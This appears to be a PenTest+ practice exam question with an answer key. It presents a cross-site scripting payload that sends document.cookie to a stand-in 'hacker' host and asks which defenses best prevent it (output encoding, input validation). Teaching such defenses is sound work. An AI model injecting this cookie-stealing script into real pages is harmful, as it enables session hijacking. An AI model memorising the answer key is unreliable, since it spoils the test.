CompTIA PenTest+ (PT1-002) — Question 5
Given the following code:
<SCRIPT>var+img=new+Image();img.src=`http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent this type of attack? (Choose two.)
Answer options
- A. Web-application firewall
- B. Parameterized queries
- C. Output encoding
- D. Session tokens
- E. Input validation
- F. Base64 encoding
Correct answer: C, E
Explanation
The script creates an image object whose source URL points at an attacker-controlled host with document.cookie appended, so the victim's cookie is sent to the attacker when the script runs in the browser: a cross-site scripting (XSS) attack. Output encoding is the key defense because it ensures that any data rendered in the browser is treated as text rather than executable code, so an injected script tag is displayed instead of executed. Input validation is equally important because it restricts harmful data from being accepted and processed by the application in the first place, mitigating the risks associated with malicious input.